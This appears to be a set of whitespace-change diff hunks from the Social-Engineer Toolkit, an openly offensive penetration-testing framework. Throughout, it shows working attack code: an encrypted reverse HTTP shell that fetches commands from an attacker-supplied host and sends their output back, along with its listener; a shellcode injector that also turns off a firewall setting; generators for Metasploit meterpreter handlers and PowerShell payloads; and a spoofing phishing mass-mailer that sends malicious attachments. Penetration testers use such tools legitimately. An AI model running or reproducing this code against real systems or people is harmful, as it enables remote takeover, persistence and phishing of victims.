core.print_warning("You will now need to pay for a code signing certificate through Verisign/Thawte/GoDaddy/etc.")
core.print_warning("Be sure to purchase a code signing certificate, not a normal website SSL certificate.")
core.print_info("When finished, enter the path to the .cer file below")
# cert_path is used for the certificate path when generating
cert_path = raw_input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while 1 == 1:
core.print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = raw_input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path): break
cert_path = raw_input(core.setprompt("0", "Path for the code signing certificate file (.spc file)"))
# if we can't find the filename
if not os.path.isfile(cert_path):
while 1 == 1:
core.print_error("ERROR:Filename not found. Please try again.")
# re-prompt if file name doesn't exist
cert_path = raw_input(core.setprompt("0", "Path to the .cer certificate file from Verisign"))
# if we detect file, then break out of loop
if os.path.isfile(cert_path): break
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# import the certificate
subprocess.Popen("keytool -import -alias MyCert -file %s" % (cert_path), shell=True).wait()
# if our certificate is in the data store
if os.path.isfile(cert_path):
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
# move it into our html directory
subprocess.Popen("mv Signed_Update.jar %s/src/program_junk/Signed_Update.jar.orig" % (definepath), shell=True).wait()
# move back to original directory
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")
# sign the applet with the imported certificate
subprocess.Popen("jarsigner -signedjar Signed_Update.jar %s/src/html/unsigned/unsigned.jar MyCert" % (definepath), shell=True).wait()
# move it into our html directory
subprocess.Popen("mv Signed_Update.jar %s/src/program_junk/Signed_Update.jar.orig" % (definepath), shell=True).wait()
# move back to original directory
core.print_status("Java Applet is now signed and will be imported into the java applet website attack from now on...")

@ -11,10 +11,10 @@ auto_migrate = check_config("AUTO_MIGRATE=")
# grab ipaddress
if check_options("IPADDR=") != 0:
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
ipaddr = check_options("IPADDR=")
else:
ipaddr = raw_input("Enter the ipaddress for the reverse connection: ")
update_options("IPADDR=" + ipaddr)
# check to see if we are using multi powershell injection
multi_injection = check_config("POWERSHELL_MULTI_INJECTION=").lower()
@ -25,43 +25,43 @@ powershell_inject_x86 = check_config("POWERSHELL_INJECT_PAYLOAD_X86=")
# if we specified a hostname then default to reverse https/http
if validate_ip(ipaddr) == False:
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
powershell_inject_x64 = "windows/meterpreter/reverse_https"
powershell_inject_x86 = "windows/meterpreter/reverse_http"
# prompt what port to listen on for powershell then make an append to the current
# prompt what port to listen on for powershell then make an append to the current
# metasploit answer file
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
# if we have multi injection on, don't worry about these
if multi_injection != "on":
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
filewrite.close()
# if we have multi injection on, don't worry about these
if multi_injection != "on":
print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
fileopen = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "r")
data = fileopen.read()
match = re.search(port, data)
if not match:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n" % (powershell_inject_x86, port))
filewrite.close()
# if we have multi injection on, don't worry about these
if multi_injection != "on":
# check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if port.options isnt there then prompt
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
# check to see if the meta config multi pyinjector is there
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
if check_options("PORT=") != 0:
port = check_options("PORT=")
# if port.options isnt there then prompt
else:
port=raw_input(setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
if port == "": port = "443"
update_options("PORT=" + port)
# if we are using multi powershell injection
if multi_injection == "on":
print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")
# define a base variable
x64 = ""
@ -73,66 +73,66 @@ multi_injection_x64 = ""
# here we do some funky loops so we don't need to rewrite the code below
if multi_injection == "on":
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
port = check_config("POWERSHELL_MULTI_PORTS=")
port = port.split(",")
if multi_injection == "on":
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status("Generating x64-based powershell injection code for port: %s" % (ports))
multi_injection_x64 = multi_injection_x64 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, ports, x64)
print_status("Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
# iterate through the ports, used for POWERSHELL_MULTI_PORTS
for ports in port:
# dont cycle through if theres a blank
if ports != "":
print_status("Generating x64-based powershell injection code for port: %s" % (ports))
multi_injection_x64 = multi_injection_x64 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, ports, x64)
print_status("Generating x86-based powershell injection code for port: %s" % (ports))
multi_injection_x86 = multi_injection_x86 + "," + generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
if os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
port_check = check_ports("%s/src/program_junk/meta_config_multipyinjector" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config_multipyinjector" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\nset LHOST 0.0.0.0\nset LPORT %s\nset ExitOnSession false\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\n set LHOST 0.0.0.0\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if we aren't using multi pyinjector
if not os.path.isfile("%s/src/program_junk/meta_config_multipyinjector" % (definepath)):
# if meta config isn't created yet then create it
if not os.path.isfile("%s/src/program_junk/meta_config" % (definepath)):
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "w")
filewrite.write("")
filewrite.close()
port_check = check_ports("%s/src/program_junk/meta_config" % (definepath), ports)
if port_check == False:
filewrite = file("%s/src/program_junk/meta_config" % (definepath), "a")
filewrite.write("\nuse exploit/multi/handler\n")
if auto_migrate == "ON":
filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
filewrite.write("set PAYLOAD %s\n set LHOST 0.0.0.0\nset ExitOnSession false\nset LPORT %s\nexploit -j\n\n" % (powershell_inject_x86, ports))
filewrite.close()
# if its turned to off
if multi_injection == "off":
print_status("Generating x64-based powershell injection code...")
x64 = generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, port, x64)
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
print_status("Generating x64-based powershell injection code...")
x64 = generate_powershell_alphanumeric_payload(powershell_inject_x64, ipaddr, port, x64)
print_status("Generating x86-based powershell injection code...")
x86 = generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)
# if we are specifying multi powershell injection
if multi_injection == "on":
x64 = multi_injection_x64[1:] # remove comma at beginning
x86 = multi_injection_x86[1:] # remove comma at beginning
x64 = multi_injection_x64[1:] # remove comma at beginning
x86 = multi_injection_x86[1:] # remove comma at beginning
# check to see if we want to display the powershell command to the user
verbose = check_config("POWERSHELL_VERBOSE=")
if verbose.lower() == "on":
print_status("Printing the x64 based encoded code...")
time.sleep(3)
print x64
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print x86
print_status("Printing the x64 based encoded code...")
time.sleep(3)
print x64
print_status("Printing the x86 based encoded code...")
time.sleep(3)
print x86
filewrite = file("%s/src/program_junk/x64.powershell" % (definepath), "w")

@ -23,15 +23,15 @@
#
##########################################################################################################################
#
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
# Below is the steps used to compile the binary. py2exe requires a dll to be used in conjunction
# so py2exe was not used. Instead, pyinstaller was used in order to byte compile the binary.
#
##########################################################################################################################
#
# export VERSIONER_PYTHON_PREFER_32_BIT=yes
# python Configure.py
# python Makespec.py --onefile --noconsole shell.py
# python Build.py shell/shell.spec
# python Build.py shell/shell.spec
#
###########################################################################################################################
@ -79,54 +79,54 @@ PASSWORD = "password_here"
# here is where we set all of our proxy settings
if PROXY_SUPPORT == "ON":
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
auth_handler = urllib2.HTTPBasicAuthHandler()
auth_handler.add_password(realm='RESTRICTED ACCESS', uri=PROXY_URL,
user=USERNAME, passwd=PASSWORD)
opener = urllib2.build_opener(auth_handler)
urllib2.install_opener(opener)
try:
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# our reverse listener ip address
address = sys.argv[1]
# our reverse listener port address
port = sys.argv[2]
# except that we didn't pass parameters
except IndexError:
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <rport>"
time.sleep(0.1)
sys.exit()
print " \nAES Encrypted Reverse HTTP Shell by:"
print " Dave Kennedy (ReL1K)"
print " http://www.secmaniac.com"
print "Usage: shell.exe <reverse_ip_address> <rport>"
time.sleep(0.1)
sys.exit()
# loop forever
while 1:
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)
# open up our request handelr
req = urllib2.Request('http://%s:%s' % (address,port))
# grab our response which contains what command we want
message = urllib2.urlopen(req)
# base64 unencode
message = base64.b64decode(message.read())
# decrypt the communications
message = DecodeAES(cipher, message)
# quit out if we receive that command
if message == "quit" or message == "exit":
sys.exit()
# issue the shell command we want
message = message.replace("{", "")
proc = subprocess.Popen(message, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# read out the data of stdout
data = proc.stdout.read() + proc.stderr.read()
# encrypt the data
data = EncodeAES(cipher, data)
# base64 encode the data
data = base64.b64encode(data)
# urlencode the data from stdout
data = urllib.urlencode({'cmd': '%s'}) % (data)
# who we want to connect back to with the shell
h = httplib.HTTPConnection('%s:%s' % (address,port))
# set our basic headers
headers = {"User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)","Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
# actually post the data
h.request('POST', '/index.aspx', data, headers)

@ -40,47 +40,47 @@ def inject(shellcode):
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))
if __name__ == '__main__':
subprocess.Popen("netsh advfirewall set global StatefulFTP disable", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
shellcode = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode)
# split our shellcode into a list
shellcode = shellcode.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in shellcode:
if payload != "":
p = multiprocessing.Process(target=inject, args=(payload,))
jobs.append(p)
p.start()
subprocess.Popen("netsh advfirewall set global StatefulFTP disable", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait()
# this will be our ultimate filename we use for the shellcode generate
# by the Social-Engineer Toolkit
try:
# our file containing shellcode
if len(sys.argv[1]) > 1:
payload_filename = sys.argv[1]
if os.path.isfile(payload_filename):
fileopen = file(payload_filename, "r")
shellcode = fileopen.read()
# if we didn't file our shellcode path then exit out
if not os.path.isfile(payload_filename):
sys.exit()
if len(sys.argv[2]) > 1:
# this is our secret key for decrypting the AES encrypted traffic
secret = sys.argv[2]
secret = base64.b64decode(secret)
# the character used for padding--with a block cipher such as AES, the value
# you encrypt must be a multiple of BLOCK_SIZE in length. This character is
# used to ensure that your value is always a multiple of BLOCK_SIZE
PADDING = '{'
BLOCK_SIZE = 32
# one-liner to sufficiently pad the text to be encrypted
pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
# one-liners to decrypt a string which will be our shellcode
DecryptAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)
cipher = AES.new(secret)
# our decrypted value for shellcode
shellcode = DecryptAES(cipher, shellcode)
# split our shellcode into a list
shellcode = shellcode.split(",")
# except an indexerror and allow it to continue forward
except IndexError:
sys.exit()
jobs = []
for payload in shellcode:
if payload != "":
p = multiprocessing.Process(target=inject, args=(payload,))
jobs.append(p)
p.start()


@ -4,7 +4,7 @@
#
# Social-Engineer Toolkit Persistence Service
#
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# Right now this is a pretty lame attempt at a service but will grow over time. The text file it reads in from isn't
# really a good idea, but it's a start.
#
#####################################################################################################################
@ -47,16 +47,16 @@ class aservice(win32serviceutil.ServiceFramework):
def SvcDoRun(self):
import servicemanager
# wait for beeing stopped ...
self.timeout=1000 # In milliseconds (update every second)
self.timeout=1000 # In milliseconds (update every second)
while self.isAlive:
# wait for service stop signal, if timeout, loop again
rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
rc=win32event.WaitForSingleObject(self.hWaitStop, self.timeout)
# expand the filesystem path
windir=os.environ['WINDIR']
# grab homepath
homedir_path = os.getenv("SystemDrive")
homedir_path = homedir_path + "\\Program Files\\Common Files\\"
# pull the windows operating system version number
# pull the windows operating system version number
windows_version = sys.getwindowsversion()[2]
# pull integer of version number
windows_version = int(windows_version)


@ -51,62 +51,62 @@ def urldecode(url):
class GetHandler(BaseHTTPRequestHandler):
# handle get request
def do_GET(self):
# handle get request
def do_GET(self):
# this will be our shell command
message = raw_input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
time.sleep(2)
sys.exit()
# send a 200 OK response
self.send_response(200)
# end headers
self.end_headers()
# encrypt the message
message = EncodeAES(cipher, message)
# base64 it
message = base64.b64encode(message)
# write our command shell param to victim
self.wfile.write(message)
# return out
return
# this will be our shell command
message = raw_input("shell> ")
# if we specify quit, then sys arg out of the shell
if message == "quit" or message == "exit":
print ("\nExiting the SET RevShell Listener... ")
time.sleep(2)
sys.exit()
# send a 200 OK response
self.send_response(200)
# end headers
self.end_headers()
# encrypt the message
message = EncodeAES(cipher, message)
# base64 it
message = base64.b64encode(message)
# write our command shell param to victim
self.wfile.write(message)
# return out
return
# handle post request
def do_POST(self):
# handle post request
def do_POST(self):
# send a 200 OK response
self.send_response(200)
# # end headers
self.end_headers()
# grab the length of the POST data
length = int(self.headers.getheader('content-length'))
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url=urldecode(qs)
# remove the parameter cmd
url=url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print message
# send a 200 OK response
self.send_response(200)
# # end headers
self.end_headers()
# grab the length of the POST data
length = int(self.headers.getheader('content-length'))
# read in the length of the POST data
qs = self.rfile.read(length)
# url decode
url=urldecode(qs)
# remove the parameter cmd
url=url.replace("cmd=", "")
# base64 decode
message = base64.b64decode(url)
# decrypt the string
message = DecodeAES(cipher, message)
# display the command back decrypted
print message
if __name__ == '__main__':
# bind to all interfaces
if check_options("PORT=") != 0:
port = check_options("PORT=")
# bind to all interfaces
if check_options("PORT=") != 0:
port = check_options("PORT=")
else:
port = 443
else:
port = 443
server = HTTPServer(('', int(port)), GetHandler)
print """############################################
server = HTTPServer(('', int(port)), GetHandler)
print """############################################
#
# The Social-Engineer Toolkit (SET) HTTP RevShell
#
@ -114,11 +114,11 @@ if __name__ == '__main__':
# https://www.trustedsec.com
#
############################################"""
print 'Starting encrypted web shell server, use <Ctrl-C> to stop'
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print "[!] Exiting the encrypted webserver shell.. hack the gibson."
print 'Starting encrypted web shell server, use <Ctrl-C> to stop'
# simple try block
try:
# serve and listen forever
server.serve_forever()
# handle keyboard interrupts
except KeyboardInterrupt:
print "[!] Exiting the encrypted webserver shell.. hack the gibson."



@ -3,25 +3,25 @@ import random
from src.core import setcore as core
try:
print ("\n [****] Custom Template Generator [****]\n")
print ("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!")
author=raw_input(core.setprompt("0", "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")
subject=raw_input(core.setprompt("0", "Email Subject"))
try:
body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=(r"\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
filewrite=file("src/templates/%s" % (filename), "w")
filewrite.write("# Author: "+author+"\n#\n#\n#\n")
filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
filewrite.write('BODY='+'"'+body+'"\n')
print "\n"
filewrite.close()
print ("\n [****] Custom Template Generator [****]\n")
print ("\n Always looking for new templates! In the set/src/templates directory send an email\nto davek@secmaniac.com if you got a good template!")
author=raw_input(core.setprompt("0", "Name of the author"))
filename=randomgen=random.randrange(1,99999999999999999999)
filename=str(filename)+(".template")
subject=raw_input(core.setprompt("0", "Email Subject"))
try:
body=raw_input(core.setprompt("0", "Message Body, hit return for a new line. Control+c when you are finished"))
while body != 'sdfsdfihdsfsodhdsofh':
try:
body+=(r"\n")
body+=raw_input("Next line of the body: ")
except KeyboardInterrupt: break
except KeyboardInterrupt: pass
filewrite=file("src/templates/%s" % (filename), "w")
filewrite.write("# Author: "+author+"\n#\n#\n#\n")
filewrite.write('SUBJECT='+'"'+subject+'"\n\n')
filewrite.write('BODY='+'"'+body+'"\n')
print "\n"
filewrite.close()
except Exception, e:
print " An error occured, printing error message: "+str(e)
print " An error occured, printing error message: "+str(e)


@ -29,7 +29,7 @@ for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
if match:
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
@ -47,8 +47,8 @@ for line in sendmail_file:
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
user=''
pwd=''
@ -78,13 +78,13 @@ for line in sendmail_file:
smtp = ("smtp.hotmail.com")
port = ("25")
# DEFINE METASPLOIT PATH
# DEFINE METASPLOIT PATH
meta_path=meta_path()
print_info("As an added bonus, use the file-format creator in SET to create your attachment.")
print_info("As an added bonus, use the file-format creator in SET to create your attachment.")
counter=0
# PDF Previous
if os.path.isfile("src/program_junk/template.pdf"):
if os.path.isfile("src/program_junk/template.pdf"):
if os.path.isfile("src/program_junk/template.rar"):
if os.path.isfile("src/program_junk/template.zip"):
print_warning("Multiple payloads were detected:")
@ -96,7 +96,7 @@ if os.path.isfile("src/program_junk/template.pdf"):
counter=1
if counter==0:
if os.path.isfile("src/program_junk/template.pdf"): file_format=("src/program_junk/template.pdf")
if os.path.isfile("src/program_junk/template.rar"): file_format=("src/program_junk/template.rar")
if os.path.isfile("src/program_junk/template.rar"): file_format=("src/program_junk/template.rar")
if os.path.isfile("src/program_junk/template.zip"): file_format=("src/program_junk/template.zip")
if os.path.isfile("src/program_junk/template.doc"): file_format=("src/program_junk/template.doc")
if os.path.isfile("src/program_junk/template.rtf"): file_format=("src/program_junk/template.rtf")
@ -156,7 +156,7 @@ if option1 == '1' or option1 == '2':
print ("""
Do you want to use a predefined template or craft
a one time email template.
a one time email template.
1. Pre-Defined Template
2. One-Time Use Email Template
@ -165,7 +165,7 @@ if option1 == '1' or option1 == '2':
# if predefined template go here
if template_choice == '1':
# set path for
path = 'src/templates/'
path = 'src/templates/'
filewrite=file("src/program_junk/email.templates", "w")
counter=0
# Pull all files in the templates directory
@ -241,12 +241,12 @@ if option1 == '1' or option1 == '2':
# single email
if option1 == '1':
to = raw_input(setprompt(["1"], "Send email to"))
to = raw_input(setprompt(["1"], "Send email to"))
# mass emailer
if option1 == '2':
print ("""
The mass emailer will allow you to send emails to multiple
The mass emailer will allow you to send emails to multiple
individuals in a list. The format is simple, it will email
based off of a line. So it should look like the following:
@ -257,16 +257,16 @@ if option1 == '2':
This will continue through until it reaches the end of the
file. You will need to specify where the file is, for example
if its in the SET folder, just specify filename.txt (or whatever
it is). If its somewhere on the filesystem, enter the full path,
it is). If its somewhere on the filesystem, enter the full path,
for example /home/relik/ihazemails.txt
""")
filepath = raw_input(setprompt(["1"], "Path to the file to import into SET"))
# exit mass mailer menu
if option1 == '99':
if option1 == '99':
exit_set()
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
print ("""\n 1. Use a %s Account for your email attack.\n 2. Use your own server or open relay\n""" % (email_provider))
relay = raw_input(setprompt(["1"], ""))
counter=0
# Specify SMTP Option Here
@ -293,11 +293,11 @@ if relay == '2':
# specify if its a high priority or not
highpri = yesno_prompt(["1"], "Flag this message/s as high priority? [yes|no]")
if not "YES" in highpri:
prioflag1 = ""
prioflag2 = ""
prioflag1 = ""
prioflag2 = ""
else:
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
prioflag1 = ' 1 (Highest)'
prioflag2 = ' High'
# Define mail send here
def mail(to, subject, text, attach, prioflag1, prioflag2):
@ -358,27 +358,27 @@ def mail(to, subject, text, attach, prioflag1, prioflag2):
return_continue()
if email_provider == "yahoo" or email_provider == "hotmail":
mailServer.login(user, pwd)
mailServer.login(user, pwd)
thread.start_new_thread(mailServer.sendmail,(user1, to, msg.as_string()))
if sendmail == 1:
thread.start_new_thread(mailServer.sendmail,(user1, to, msg.as_string()))
if sendmail == 1:
thread.start_new_thread(mailServer.sendmail,(user1, to, msg.as_string()))
if option1 == '1':
mail("%s" % (to), subject, body, "%s" % (file_format), prioflag1, prioflag2)
if option1 == '2':
counter=0
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
mail("%s" % (to),
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num=email_num+1
print " Sent e-mail number: " + (str(email_num))
counter=0
email_num=0
fileopen=file(filepath, "r").readlines()
for line in fileopen:
to = line.rstrip()
mail("%s" % (to),
subject,
body,
"%s" % (file_format), prioflag1, prioflag2)
email_num=email_num+1
print " Sent e-mail number: " + (str(email_num))
if not os.path.isfile("src/program_junk/template.zip"):
print_status("SET has finished delivering the emails")
@ -392,7 +392,7 @@ if not os.path.isfile("src/program_junk/template.zip"):
child=pexpect.spawn("ruby %s/msfconsole -L -n -r src/program_junk/unc_config" % (meta_path))
try: child.interact()
except Exception: child.close()
if os.path.isfile("src/program_junk/payload.options"):
fileopen=file("src/program_junk/payload.options","r").readlines()
for line in fileopen:


@ -32,62 +32,62 @@ sendmail=0
# need to do this if we aren't in the SET root
if "program_junk" in definepath:
definepath = definepath.replace("src/program_junk/web_clone", "")
definepath = definepath.replace("src/program_junk/web_clone", "")
sendmail_file=file("%s/config/set_config" % (definepath),"r").readlines()
for line in sendmail_file:
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
# if yes, then do some good stuff
if sendmail_choice == "YES":
print_info("Sendmail can take up to 3-5 minutes to start")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
if not os.path.isfile("/etc/init.d/sendmail"):
pause = raw_input("[!] Sendmail was not found. Try again and restart.")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
user=''
pwd=''
# strip carriage returns
line=line.rstrip()
match=re.search("SENDMAIL=",line)
if match:
# if match and if line is flipped on continue on
if line == ("SENDMAIL=ON"):
print_info("Sendmail is a Linux based SMTP Server, this can be used to spoof email addresses.")
print_info("Sendmail can take up to three minutes to start")
print_status("Sendmail is set to ON")
sendmail_choice = yesno_prompt(["1"], "Start Sendmail? [yes|no]")
# if yes, then do some good stuff
if sendmail_choice == "YES":
print_info("Sendmail can take up to 3-5 minutes to start")
if os.path.isfile("/etc/init.d/sendmail"):
subprocess.Popen("/etc/init.d/sendmail start", shell=True).wait()
if not os.path.isfile("/etc/init.d/sendmail"):
pause = raw_input("[!] Sendmail was not found. Try again and restart.")
sys.exit()
smtp = ("localhost")
port = ("25")
# Flip sendmail switch to get rid of some questions
sendmail=1
# just throw user and password to blank, needed for defining below
user=''
pwd=''
